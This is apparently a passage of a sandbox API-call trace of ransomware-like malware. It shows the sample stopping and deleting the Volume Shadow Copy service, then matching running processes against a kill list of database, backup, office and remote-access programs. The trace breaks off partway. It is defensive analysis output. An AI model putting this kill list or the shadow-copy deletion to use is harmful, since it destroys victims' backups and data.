[0148.462] _wcslwr (in: _String=0x1598b4 | out: _String="microsoft sharepoint workspace audit service") returned="microsoft sharepoint workspace audit service" [0148.462] _wcslwr (in: _String=0x15984e | out: _String="mmcss") returned="mmcss" [0148.462] _wcslwr (in: _String=0x1597f2 | out: _String="mozillamaintenance") returned="mozillamaintenance" [0148.462] _wcslwr (in: _String=0x1597ac | out: _String="mpssvc") returned="mpssvc" [0148.462] _wcslwr (in: _String=0x15977e | out: _String="msdtc") returned="msdtc" [0148.462] _wcslwr (in: _String=0x159726 | out: _String="msiscsi") returned="msiscsi" [0148.462] _wcslwr (in: _String=0x1596ce | out: _String="msiserver") returned="msiserver" [0148.462] _wcslwr (in: _String=0x159698 | out: _String="napagent") returned="napagent" [0148.462] _wcslwr (in: _String=0x159646 | out: _String="netlogon") returned="netlogon" [0148.462] _wcslwr (in: _String=0x159626 | out: _String="netman") returned="netman" [0148.462] _wcslwr (in: _String=0x1595dc | out: _String="netmsmqactivator") returned="netmsmqactivator" [0148.462] _wcslwr (in: _String=0x159586 | out: _String="netpipeactivator") returned="netpipeactivator" [0148.462] _wcslwr (in: _String=0x159540 | out: _String="netprofm") returned="netprofm" [0148.462] _wcslwr (in: _String=0x1594f6 | out: _String="nettcpactivator") returned="nettcpactivator" [0148.462] _wcslwr (in: _String=0x1594a0 | out: _String="nettcpportsharing") returned="nettcpportsharing" [0148.462] _wcslwr (in: _String=0x159458 | out: _String="nlasvc") returned="nlasvc" [0148.462] _wcslwr (in: _String=0x15941a | out: _String="nsi") returned="nsi" [0148.462] _wcslwr (in: _String=0x1593ce | out: _String="ose64") returned="ose64" [0148.463] _wcslwr (in: _String=0x15938e | out: _String="osppsvc") returned="osppsvc" [0148.463] _wcslwr (in: _String=0x159334 | out: _String="p2pimsvc") returned="p2pimsvc" [0148.463] _wcslwr (in: _String=0x1592e4 | out: _String="p2psvc") returned="p2psvc" [0148.463] _wcslwr (in: _String=0x1592a4 | out: _String="pcasvc") returned="pcasvc" [0148.463] _wcslwr (in: _String=0x15923c | out: _String="peerdistsvc") returned="peerdistsvc" [0148.463] _wcslwr (in: _String=0x159212 | out: _String="perfhost") returned="perfhost" [0148.463] _wcslwr (in: _String=0x1591d0 | out: _String="pla") returned="pla" [0148.463] _wcslwr (in: _String=0x15918a | out: _String="plugplay") returned="plugplay" [0148.463] _wcslwr (in: _String=0x159156 | out: _String="pnrpautoreg") returned="pnrpautoreg" [0148.463] _wcslwr (in: _String=0x1590fa | out: _String="pnrpsvc") returned="pnrpsvc" [0148.463] _wcslwr (in: _String=0x1590a6 | out: _String="policyagent") returned="policyagent" [0148.463] _wcslwr (in: _String=0x159074 | out: _String="power") returned="power" [0148.463] _wcslwr (in: _String=0x159058 | out: _String="profsvc") returned="profsvc" [0148.463] _wcslwr (in: _String=0x15900c | out: _String="protectedstorage") returned="protectedstorage" [0148.463] _wcslwr (in: _String=0x158fdc | out: _String="qwave") returned="qwave" [0148.463] _wcslwr (in: _String=0x158f7e | out: _String="rasauto") returned="rasauto" [0148.463] _wcslwr (in: _String=0x158f24 | out: _String="rasman") returned="rasman" [0148.463] _wcslwr (in: _String=0x158ec8 | out: _String="remoteaccess") returned="remoteaccess" [0148.463] _wcslwr (in: _String=0x158e76 | out: _String="remoteregistry") returned="remoteregistry" [0148.463] _wcslwr (in: _String=0x158e3c | out: _String="rpceptmapper") returned="rpceptmapper" [0148.464] _wcslwr (in: _String=0x158dfe | out: _String="rpclocator") returned="rpclocator" [0148.464] _wcslwr (in: _String=0x158daa | out: _String="rpcss") returned="rpcss" [0148.464] _wcslwr (in: _String=0x158d66 | out: _String="samss") returned="samss" [0148.464] _wcslwr (in: _String=0x158d20 | out: _String="scardsvr") returned="scardsvr" [0148.464] _wcslwr (in: _String=0x158cf8 | out: _String="schedule") returned="schedule" [0148.464] _wcslwr (in: _String=0x158cc2 | out: _String="scpolicysvc") returned="scpolicysvc" [0148.464] _wcslwr (in: _String=0x158c80 | out: _String="sdrsvc") returned="sdrsvc" [0148.464] _wcslwr (in: _String=0x158c50 | out: _String="seclogon") returned="seclogon" [0148.464] _wcslwr (in: _String=0x158c26 | out: _String="sens") returned="sens" [0148.464] _wcslwr (in: _String=0x158bd0 | out: _String="sensrsvc") returned="sensrsvc" [0148.464] _wcslwr (in: _String=0x158b92 | out: _String="sessionenv") returned="sessionenv" [0148.464] _wcslwr (in: _String=0x158b3e | out: _String="sharedaccess") returned="sharedaccess" [0148.464] _wcslwr (in: _String=0x158ad8 | out: _String="shellhwdetection") returned="shellhwdetection" [0148.464] _wcslwr (in: _String=0x158a94 | out: _String="snmptrap") returned="snmptrap" [0148.464] _wcslwr (in: _String=0x158a70 | out: _String="spooler") returned="spooler" [0148.464] _wcslwr (in: _String=0x158a46 | out: _String="sppsvc") returned="sppsvc" [0148.464] _wcslwr (in: _String=0x158a06 | out: _String="sppuinotify") returned="sppuinotify" [0148.464] _wcslwr (in: _String=0x1589c4 | out: _String="ssdpsrv") returned="ssdpsrv" [0148.464] _wcslwr (in: _String=0x158996 | out: _String="sstpsvc") returned="sstpsvc" [0148.464] _wcslwr (in: _String=0x158936 | out: _String="stisvc") returned="stisvc" [0148.464] _wcslwr (in: _String=0x1588e6 | out: _String="storsvc") returned="storsvc" [0148.465] _wcslwr (in: _String=0x1588ba | out: _String="swprv") returned="swprv" [0148.465] _wcslwr (in: _String=0x15885a | out: _String="sysmain") returned="sysmain" [0148.465] _wcslwr (in: _String=0x15881e | out: _String="tabletinputservice") returned="tabletinputservice" [0148.465] _wcslwr (in: _String=0x1587de | out: _String="tapisrv") returned="tapisrv" [0148.465] _wcslwr (in: _String=0x1587c2 | out: _String="tbs") returned="tbs" [0148.465] _wcslwr (in: _String=0x158786 | out: _String="termservice") returned="termservice" [0148.465] _wcslwr (in: _String=0x158748 | out: _String="themes") returned="themes" [0148.465] _wcslwr (in: _String=0x158722 | out: _String="threadorder") returned="threadorder" [0148.465] _wcslwr (in: _String=0x1586e6 | out: _String="trkwks") returned="trkwks" [0148.465] _wcslwr (in: _String=0x158682 | out: _String="trustedinstaller") returned="trustedinstaller" [0148.465] _wcslwr (in: _String=0x15863a | out: _String="ui0detect") returned="ui0detect" [0148.465] _wcslwr (in: _String=0x1585e2 | out: _String="umrdpservice") returned="umrdpservice" [0148.465] _wcslwr (in: _String=0x15856e | out: _String="upnphost") returned="upnphost" [0148.465] _wcslwr (in: _String=0x158540 | out: _String="uxsms") returned="uxsms" [0148.465] _wcslwr (in: _String=0x1584e0 | out: _String="vaultsvc") returned="vaultsvc" [0148.465] _wcslwr (in: _String=0x1584b2 | out: _String="vds") returned="vds" [0148.465] _wcslwr (in: _String=0x158490 | out: _String="vss") returned="vss" [0148.465] OpenServiceW (hSCManager=0x14ee10, lpServiceName="vss", dwDesiredAccess=0x10020) returned 0x14e668 [0148.467] ControlService (in: hService=0x14e668, dwControl=0x1, lpServiceStatus=0x32f95c | out: lpServiceStatus=0x32f95c*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0148.470] DeleteService (hService=0x14e668) returned 1 [0148.472] CloseServiceHandle (hSCObject=0x14e668) returned 1 [0148.472] _wcslwr (in: _String=0x15845a | out: _String="w32time") returned="w32time" [0148.472] _wcslwr (in: _String=0x15842e | out: _String="wbengine") returned="wbengine" [0148.472] _wcslwr (in: _String=0x1583d8 | out: _String="wbiosrvc") returned="wbiosrvc" [0148.472] _wcslwr (in: _String=0x158394 | out: _String="wcncsvc") returned="wcncsvc" [0148.472] _wcslwr (in: _String=0x158324 | out: _String="wcspluginservice") returned="wcspluginservice" [0148.473] _wcslwr (in: _String=0x1582dc | out: _String="wdiservicehost") returned="wdiservicehost" [0148.473] _wcslwr (in: _String=0x158290 | out: _String="wdisystemhost") returned="wdisystemhost" [0148.473] _wcslwr (in: _String=0x15824e | out: _String="webclient") returned="webclient" [0148.473] _wcslwr (in: _String=0x15822c | out: _String="wecsvc") returned="wecsvc" [0148.473] _wcslwr (in: _String=0x1581e0 | out: _String="wercplsupport") returned="wercplsupport" [0148.473] _wcslwr (in: _String=0x15816a | out: _String="wersvc") returned="wersvc" [0148.473] _wcslwr (in: _String=0x158116 | out: _String="windefend") returned="windefend" [0148.473] _wcslwr (in: _String=0x1580cc | out: _String="winhttpautoproxysvc") returned="winhttpautoproxysvc" [0148.473] _wcslwr (in: _String=0x15806a | out: _String="winmgmt") returned="winmgmt" [0148.473] _wcslwr (in: _String=0x158018 | out: _String="winrm") returned="winrm" [0148.473] _wcslwr (in: _String=0x157fb4 | out: _String="wlansvc") returned="wlansvc" [0148.473] _wcslwr (in: _String=0x157f82 | out: _String="wmiapsrv") returned="wmiapsrv" [0148.473] _wcslwr (in: _String=0x157f36 | out: _String="wmpnetworksvc") returned="wmpnetworksvc" [0148.473] _wcslwr (in: _String=0x157ece | out: _String="wpcsvc") returned="wpcsvc" [0148.473] _wcslwr (in: _String=0x157e94 | out: _String="wpdbusenum") returned="wpdbusenum" [0148.473] _wcslwr (in: _String=0x157e40 | out: _String="wscsvc") returned="wscsvc" [0148.473] _wcslwr (in: _String=0x157e10 | out: _String="wsearch") returned="wsearch" [0148.473] _wcslwr (in: _String=0x157de0 | out: _String="wuauserv") returned="wuauserv" [0148.473] _wcslwr (in: _String=0x157db2 | out: _String="wudfsvc") returned="wudfsvc" [0148.473] _wcslwr (in: _String=0x157d34 | out: _String="wwansvc") returned="wwansvc" [0148.473] CloseServiceHandle (hSCObject=0x14ee10) returned 1 [0148.474] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1561c0) returned 1 [0148.474] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17d7a8) returned 1 [0148.474] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x17d7a8 [0148.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x17d7a8, Length=0x400, ResultLength=0x32f984 | out: SystemInformation=0x17d7a8, ResultLength=0x32f984*=0x11258) returned 0xc0000004 [0148.474] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x17d7a8, Size=0x11258) returned 0x1561c0 [0148.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1561c0, Length=0x11258, ResultLength=0x32f984 | out: SystemInformation=0x1561c0, ResultLength=0x32f984*=0xd5d0) returned 0x0 [0148.476] _wcslwr (in: _String=0x157530 | out: _String="system") returned="system" [0148.476] wcsstr (_Str="system", _SubStr="sql") returned 0x0 [0148.476] wcslen (_String="sql") returned 0x3 [0148.476] wcsstr (_Str="system", _SubStr="oracle") returned 0x0 [0148.476] wcslen (_String="oracle") returned 0x6 [0148.476] wcsstr (_Str="system", _SubStr="ocssd") returned 0x0 [0148.476] wcslen (_String="ocssd") returned 0x5 [0148.477] wcsstr (_Str="system", _SubStr="dbsnmp") returned 0x0 [0148.477] wcslen (_String="dbsnmp") returned 0x6 [0148.477] wcsstr (_Str="system", _SubStr="synctime") returned 0x0 [0148.477] wcslen (_String="synctime") returned 0x8 [0148.477] wcsstr (_Str="system", _SubStr="agntsvc") returned 0x0 [0148.477] wcslen (_String="agntsvc") returned 0x7 [0148.477] wcsstr (_Str="system", _SubStr="isqlplussvc") returned 0x0 [0148.477] wcslen (_String="isqlplussvc") returned 0xb [0148.477] wcsstr (_Str="system", _SubStr="xfssvccon") returned 0x0 [0148.477] wcslen (_String="xfssvccon") returned 0x9 [0148.477] wcsstr (_Str="system", _SubStr="mydesktopservice") returned 0x0 [0148.477] wcslen (_String="mydesktopservice") returned 0x10 [0148.477] wcsstr (_Str="system", _SubStr="ocautoupds") returned 0x0 [0148.477] wcslen (_String="ocautoupds") returned 0xa [0148.477] wcsstr (_Str="system", _SubStr="encsvc") returned 0x0 [0148.477] wcslen (_String="encsvc") returned 0x6 [0148.477] wcsstr (_Str="system", _SubStr="firefox") returned 0x0 [0148.477] wcslen (_String="firefox") returned 0x7 [0148.477] wcsstr (_Str="system", _SubStr="tbirdconfig") returned 0x0 [0148.477] wcslen (_String="tbirdconfig") returned 0xb [0148.477] wcsstr (_Str="system", _SubStr="mydesktopqos") returned 0x0 [0148.477] wcslen (_String="mydesktopqos") returned 0xc [0148.477] wcsstr (_Str="system", _SubStr="ocomm") returned 0x0 [0148.477] wcslen (_String="ocomm") returned 0x5 [0148.477] wcsstr (_Str="system", _SubStr="dbeng50") returned 0x0 [0148.477] wcslen (_String="dbeng50") returned 0x7 [0148.477] wcsstr (_Str="system", _SubStr="sqbcoreservice") returned 0x0 [0148.477] wcslen (_String="sqbcoreservice") returned 0xe [0148.477] wcsstr (_Str="system", _SubStr="excel") returned 0x0 [0148.477] wcslen (_String="excel") returned 0x5 [0148.477] wcsstr (_Str="system", _SubStr="infopath") returned 0x0 [0148.477] wcslen (_String="infopath") returned 0x8 [0148.478] wcsstr (_Str="system", _SubStr="msaccess") returned 0x0 [0148.478] wcslen (_String="msaccess") returned 0x8 [0148.478] wcsstr (_Str="system", _SubStr="mspub") returned 0x0 [0148.478] wcslen (_String="mspub") returned 0x5 [0148.478] wcsstr (_Str="system", _SubStr="onenote") returned 0x0 [0148.478] wcslen (_String="onenote") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="outlook") returned 0x0 [0148.478] wcslen (_String="outlook") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="powerpnt") returned 0x0 [0148.478] wcslen (_String="powerpnt") returned 0x8 [0148.478] wcsstr (_Str="system", _SubStr="steam") returned 0x0 [0148.478] wcslen (_String="steam") returned 0x5 [0148.478] wcsstr (_Str="system", _SubStr="thebat") returned 0x0 [0148.478] wcslen (_String="thebat") returned 0x6 [0148.478] wcsstr (_Str="system", _SubStr="thunderbird") returned 0x0 [0148.478] wcslen (_String="thunderbird") returned 0xb [0148.478] wcsstr (_Str="system", _SubStr="visio") returned 0x0 [0148.478] wcslen (_String="visio") returned 0x5 [0148.478] wcsstr (_Str="system", _SubStr="winword") returned 0x0 [0148.478] wcslen (_String="winword") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="wordpad") returned 0x0 [0148.478] wcslen (_String="wordpad") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="notepad") returned 0x0 [0148.478] wcslen (_String="notepad") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="bedbh") returned 0x0 [0148.478] wcslen (_String="bedbh") returned 0x5 [0148.478] wcsstr (_Str="system", _SubStr="vxmon") returned 0x0 [0148.478] wcslen (_String="vxmon") returned 0x5 [0148.478] wcsstr (_Str="system", _SubStr="benetns") returned 0x0 [0148.478] wcslen (_String="benetns") returned 0x7 [0148.478] wcsstr (_Str="system", _SubStr="bengien") returned 0x0 [0148.479] wcslen (_String="bengien") returned 0x7 [0148.479] wcsstr (_Str="system", _SubStr="pvlsvr") returned 0x0 [0148.479] wcslen (_String="pvlsvr") returned 0x6 [0148.479] wcsstr (_Str="system", _SubStr="beserver") returned 0x0 [0148.479] wcslen (_String="beserver") returned 0x8 [0148.479] wcsstr (_Str="system", _SubStr="raw_agent_svc") returned 0x0 [0148.479] wcslen (_String="raw_agent_svc") returned 0xd [0148.479] wcsstr (_Str="system", _SubStr="vsnapvss") returned 0x0 [0148.479] wcslen (_String="vsnapvss") returned 0x8 [0148.479] wcsstr (_Str="system", _SubStr="CagService") returned 0x0 [0148.479] wcslen (_String="CagService") returned 0xa [0148.479] wcsstr (_Str="system", _SubStr="QBIDPService") returned 0x0 [0148.479] wcslen (_String="QBIDPService") returned 0xc [0148.479] wcsstr (_Str="system", _SubStr="QBDBMgrN") returned 0x0 [0148.479] wcslen (_String="QBDBMgrN") returned 0x8 [0148.479] wcsstr (_Str="system", _SubStr="QBCFMonitorService") returned 0x0 [0148.479] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.479] wcsstr (_Str="system", _SubStr="SAP") returned 0x0 [0148.479] wcslen (_String="SAP") returned 0x3 [0148.479] wcsstr (_Str="system", _SubStr="TeamViewer_Service.exe") returned 0x0 [0148.479] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0148.479] wcsstr (_Str="system", _SubStr="TeamViewer.exe") returned 0x0 [0148.479] wcslen (_String="TeamViewer.exe") returned 0xe [0148.479] wcsstr (_Str="system", _SubStr="tv_w32.exe") returned 0x0 [0148.479] wcslen (_String="tv_w32.exe") returned 0xa [0148.479] wcsstr (_Str="system", _SubStr="tv_x64.exe") returned 0x0 [0148.479] wcslen (_String="tv_x64.exe") returned 0xa [0148.479] wcsstr (_Str="system", _SubStr="CVMountd") returned 0x0 [0148.479] wcslen (_String="CVMountd") returned 0x8 [0148.479] wcsstr (_Str="system", _SubStr="cvd") returned 0x0 [0148.480] wcslen (_String="cvd") returned 0x3 [0148.480] wcsstr (_Str="system", _SubStr="cvfwd") returned 0x0 [0148.480] wcslen (_String="cvfwd") returned 0x5 [0148.480] wcsstr (_Str="system", _SubStr="CVODS") returned 0x0 [0148.480] wcslen (_String="CVODS") returned 0x5 [0148.480] wcsstr (_Str="system", _SubStr="saphostexec") returned 0x0 [0148.480] wcslen (_String="saphostexec") returned 0xb [0148.480] wcsstr (_Str="system", _SubStr="saposcol") returned 0x0 [0148.480] wcslen (_String="saposcol") returned 0x8 [0148.480] wcsstr (_Str="system", _SubStr="sapstartsrv") returned 0x0 [0148.480] wcslen (_String="sapstartsrv") returned 0xb [0148.480] wcsstr (_Str="system", _SubStr="avagent") returned 0x0 [0148.480] wcslen (_String="avagent") returned 0x7 [0148.480] wcsstr (_Str="system", _SubStr="avscc") returned 0x0 [0148.480] wcslen (_String="avscc") returned 0x5 [0148.480] wcsstr (_Str="system", _SubStr="DellSystemDetect") returned 0x0 [0148.480] wcslen (_String="DellSystemDetect") returned 0x10 [0148.480] wcsstr (_Str="system", _SubStr="EnterpriseClient") returned 0x0 [0148.480] wcslen (_String="EnterpriseClient") returned 0x10 [0148.480] wcsstr (_Str="system", _SubStr="VeeamNFSSvc") returned 0x0 [0148.480] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.480] wcsstr (_Str="system", _SubStr="VeeamTransportSvc") returned 0x0 [0148.480] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.480] wcsstr (_Str="system", _SubStr="VeeamDeploymentSvc") returned 0x0 [0148.480] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0148.480] _wcslwr (in: _String=0x157678 | out: _String="smss.exe") returned="smss.exe" [0148.480] wcsstr (_Str="smss.exe", _SubStr="sql") returned 0x0 [0148.480] wcslen (_String="sql") returned 0x3 [0148.480] wcsstr (_Str="smss.exe", _SubStr="oracle") returned 0x0 [0148.480] wcslen (_String="oracle") returned 0x6 [0148.480] wcsstr (_Str="smss.exe", _SubStr="ocssd") returned 0x0 [0148.481] wcslen (_String="ocssd") returned 0x5 [0148.481] wcsstr (_Str="smss.exe", _SubStr="dbsnmp") returned 0x0 [0148.481] wcslen (_String="dbsnmp") returned 0x6 [0148.481] wcsstr (_Str="smss.exe", _SubStr="synctime") returned 0x0 [0148.481] wcslen (_String="synctime") returned 0x8 [0148.481] wcsstr (_Str="smss.exe", _SubStr="agntsvc") returned 0x0 [0148.481] wcslen (_String="agntsvc") returned 0x7 [0148.481] wcsstr (_Str="smss.exe", _SubStr="isqlplussvc") returned 0x0 [0148.481] wcslen (_String="isqlplussvc") returned 0xb [0148.481] wcsstr (_Str="smss.exe", _SubStr="xfssvccon") returned 0x0 [0148.481] wcslen (_String="xfssvccon") returned 0x9 [0148.481] wcsstr (_Str="smss.exe", _SubStr="mydesktopservice") returned 0x0 [0148.481] wcslen (_String="mydesktopservice") returned 0x10 [0148.481] wcsstr (_Str="smss.exe", _SubStr="ocautoupds") returned 0x0 [0148.481] wcslen (_String="ocautoupds") returned 0xa [0148.481] wcsstr (_Str="smss.exe", _SubStr="encsvc") returned 0x0 [0148.481] wcslen (_String="encsvc") returned 0x6 [0148.481] wcsstr (_Str="smss.exe", _SubStr="firefox") returned 0x0 [0148.481] wcslen (_String="firefox") returned 0x7 [0148.481] wcsstr (_Str="smss.exe", _SubStr="tbirdconfig") returned 0x0 [0148.481] wcslen (_String="tbirdconfig") returned 0xb [0148.481] wcsstr (_Str="smss.exe", _SubStr="mydesktopqos") returned 0x0 [0148.481] wcslen (_String="mydesktopqos") returned 0xc [0148.481] wcsstr (_Str="smss.exe", _SubStr="ocomm") returned 0x0 [0148.481] wcslen (_String="ocomm") returned 0x5 [0148.481] wcsstr (_Str="smss.exe", _SubStr="dbeng50") returned 0x0 [0148.481] wcslen (_String="dbeng50") returned 0x7 [0148.481] wcsstr (_Str="smss.exe", _SubStr="sqbcoreservice") returned 0x0 [0148.481] wcslen (_String="sqbcoreservice") returned 0xe [0148.482] wcsstr (_Str="smss.exe", _SubStr="excel") returned 0x0 [0148.482] wcslen (_String="excel") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="infopath") returned 0x0 [0148.482] wcslen (_String="infopath") returned 0x8 [0148.482] wcsstr (_Str="smss.exe", _SubStr="msaccess") returned 0x0 [0148.482] wcslen (_String="msaccess") returned 0x8 [0148.482] wcsstr (_Str="smss.exe", _SubStr="mspub") returned 0x0 [0148.482] wcslen (_String="mspub") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="onenote") returned 0x0 [0148.482] wcslen (_String="onenote") returned 0x7 [0148.482] wcsstr (_Str="smss.exe", _SubStr="outlook") returned 0x0 [0148.482] wcslen (_String="outlook") returned 0x7 [0148.482] wcsstr (_Str="smss.exe", _SubStr="powerpnt") returned 0x0 [0148.482] wcslen (_String="powerpnt") returned 0x8 [0148.482] wcsstr (_Str="smss.exe", _SubStr="steam") returned 0x0 [0148.482] wcslen (_String="steam") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="thebat") returned 0x0 [0148.482] wcslen (_String="thebat") returned 0x6 [0148.482] wcsstr (_Str="smss.exe", _SubStr="thunderbird") returned 0x0 [0148.482] wcslen (_String="thunderbird") returned 0xb [0148.482] wcsstr (_Str="smss.exe", _SubStr="visio") returned 0x0 [0148.482] wcslen (_String="visio") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="winword") returned 0x0 [0148.482] wcslen (_String="winword") returned 0x7 [0148.482] wcsstr (_Str="smss.exe", _SubStr="wordpad") returned 0x0 [0148.482] wcslen (_String="wordpad") returned 0x7 [0148.482] wcsstr (_Str="smss.exe", _SubStr="notepad") returned 0x0 [0148.482] wcslen (_String="notepad") returned 0x7 [0148.482] wcsstr (_Str="smss.exe", _SubStr="bedbh") returned 0x0 [0148.482] wcslen (_String="bedbh") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="vxmon") returned 0x0 [0148.482] wcslen (_String="vxmon") returned 0x5 [0148.482] wcsstr (_Str="smss.exe", _SubStr="benetns") returned 0x0 [0148.483] wcslen (_String="benetns") returned 0x7 [0148.483] wcsstr (_Str="smss.exe", _SubStr="bengien") returned 0x0 [0148.483] wcslen (_String="bengien") returned 0x7 [0148.483] wcsstr (_Str="smss.exe", _SubStr="pvlsvr") returned 0x0 [0148.483] wcslen (_String="pvlsvr") returned 0x6 [0148.483] wcsstr (_Str="smss.exe", _SubStr="beserver") returned 0x0 [0148.483] wcslen (_String="beserver") returned 0x8 [0148.483] wcsstr (_Str="smss.exe", _SubStr="raw_agent_svc") returned 0x0 [0148.483] wcslen (_String="raw_agent_svc") returned 0xd [0148.483] wcsstr (_Str="smss.exe", _SubStr="vsnapvss") returned 0x0 [0148.483] wcslen (_String="vsnapvss") returned 0x8 [0148.483] wcsstr (_Str="smss.exe", _SubStr="CagService") returned 0x0 [0148.483] wcslen (_String="CagService") returned 0xa [0148.483] wcsstr (_Str="smss.exe", _SubStr="QBIDPService") returned 0x0 [0148.483] wcslen (_String="QBIDPService") returned 0xc [0148.483] wcsstr (_Str="smss.exe", _SubStr="QBDBMgrN") returned 0x0 [0148.483] wcslen (_String="QBDBMgrN") returned 0x8 [0148.483] wcsstr (_Str="smss.exe", _SubStr="QBCFMonitorService") returned 0x0 [0148.483] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.483] wcsstr (_Str="smss.exe", _SubStr="SAP") returned 0x0 [0148.483] wcslen (_String="SAP") returned 0x3 [0148.483] wcsstr (_Str="smss.exe", _SubStr="TeamViewer_Service.exe") returned 0x0 [0148.483] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0148.483] wcsstr (_Str="smss.exe", _SubStr="TeamViewer.exe") returned 0x0 [0148.483] wcslen (_String="TeamViewer.exe") returned 0xe [0148.483] wcsstr (_Str="smss.exe", _SubStr="tv_w32.exe") returned 0x0 [0148.483] wcslen (_String="tv_w32.exe") returned 0xa [0148.483] wcsstr (_Str="smss.exe", _SubStr="tv_x64.exe") returned 0x0 [0148.483] wcslen (_String="tv_x64.exe") returned 0xa [0148.483] wcsstr (_Str="smss.exe", _SubStr="CVMountd") returned 0x0 [0148.483] wcslen (_String="CVMountd") returned 0x8 [0148.483] wcsstr (_Str="smss.exe", _SubStr="cvd") returned 0x0 [0148.483] wcslen (_String="cvd") returned 0x3 [0148.484] wcsstr (_Str="smss.exe", _SubStr="cvfwd") returned 0x0 [0148.484] wcslen (_String="cvfwd") returned 0x5 [0148.484] wcsstr (_Str="smss.exe", _SubStr="CVODS") returned 0x0 [0148.484] wcslen (_String="CVODS") returned 0x5 [0148.484] wcsstr (_Str="smss.exe", _SubStr="saphostexec") returned 0x0 [0148.484] wcslen (_String="saphostexec") returned 0xb [0148.484] wcsstr (_Str="smss.exe", _SubStr="saposcol") returned 0x0 [0148.484] wcslen (_String="saposcol") returned 0x8 [0148.484] wcsstr (_Str="smss.exe", _SubStr="sapstartsrv") returned 0x0 [0148.484] wcslen (_String="sapstartsrv") returned 0xb [0148.484] wcsstr (_Str="smss.exe", _SubStr="avagent") returned 0x0 [0148.484] wcslen (_String="avagent") returned 0x7 [0148.484] wcsstr (_Str="smss.exe", _SubStr="avscc") returned 0x0 [0148.484] wcslen (_String="avscc") returned 0x5 [0148.484] wcsstr (_Str="smss.exe", _SubStr="DellSystemDetect") returned 0x0 [0148.484] wcslen (_String="DellSystemDetect") returned 0x10 [0148.484] wcsstr (_Str="smss.exe", _SubStr="EnterpriseClient") returned 0x0 [0148.484] wcslen (_String="EnterpriseClient") returned 0x10 [0148.484] wcsstr (_Str="smss.exe", _SubStr="VeeamNFSSvc") returned 0x0 [0148.484] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.484] wcsstr (_Str="smss.exe", _SubStr="VeeamTransportSvc") returned 0x0 [0148.484] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.484] wcsstr (_Str="smss.exe", _SubStr="VeeamDeploymentSvc") returned 0x0 [0148.484] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0148.484] _wcslwr (in: _String=0x157988 | out: _String="csrss.exe") returned="csrss.exe" [0148.484] wcsstr (_Str="csrss.exe", _SubStr="sql") returned 0x0 [0148.484] wcslen (_String="sql") returned 0x3 [0148.484] wcsstr (_Str="csrss.exe", _SubStr="oracle") returned 0x0 [0148.484] wcslen (_String="oracle") returned 0x6 [0148.484] wcsstr (_Str="csrss.exe", _SubStr="ocssd") returned 0x0 [0148.484] wcslen (_String="ocssd") returned 0x5 [0148.484] wcsstr (_Str="csrss.exe", _SubStr="dbsnmp") returned 0x0 [0148.484] wcslen (_String="dbsnmp") returned 0x6 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="synctime") returned 0x0 [0148.485] wcslen (_String="synctime") returned 0x8 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="agntsvc") returned 0x0 [0148.485] wcslen (_String="agntsvc") returned 0x7 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="isqlplussvc") returned 0x0 [0148.485] wcslen (_String="isqlplussvc") returned 0xb [0148.485] wcsstr (_Str="csrss.exe", _SubStr="xfssvccon") returned 0x0 [0148.485] wcslen (_String="xfssvccon") returned 0x9 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="mydesktopservice") returned 0x0 [0148.485] wcslen (_String="mydesktopservice") returned 0x10 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="ocautoupds") returned 0x0 [0148.485] wcslen (_String="ocautoupds") returned 0xa [0148.485] wcsstr (_Str="csrss.exe", _SubStr="encsvc") returned 0x0 [0148.485] wcslen (_String="encsvc") returned 0x6 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="firefox") returned 0x0 [0148.485] wcslen (_String="firefox") returned 0x7 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="tbirdconfig") returned 0x0 [0148.485] wcslen (_String="tbirdconfig") returned 0xb [0148.485] wcsstr (_Str="csrss.exe", _SubStr="mydesktopqos") returned 0x0 [0148.485] wcslen (_String="mydesktopqos") returned 0xc [0148.485] wcsstr (_Str="csrss.exe", _SubStr="ocomm") returned 0x0 [0148.485] wcslen (_String="ocomm") returned 0x5 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="dbeng50") returned 0x0 [0148.485] wcslen (_String="dbeng50") returned 0x7 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="sqbcoreservice") returned 0x0 [0148.485] wcslen (_String="sqbcoreservice") returned 0xe [0148.485] wcsstr (_Str="csrss.exe", _SubStr="excel") returned 0x0 [0148.485] wcslen (_String="excel") returned 0x5 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="infopath") returned 0x0 [0148.485] wcslen (_String="infopath") returned 0x8 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="msaccess") returned 0x0 [0148.485] wcslen (_String="msaccess") returned 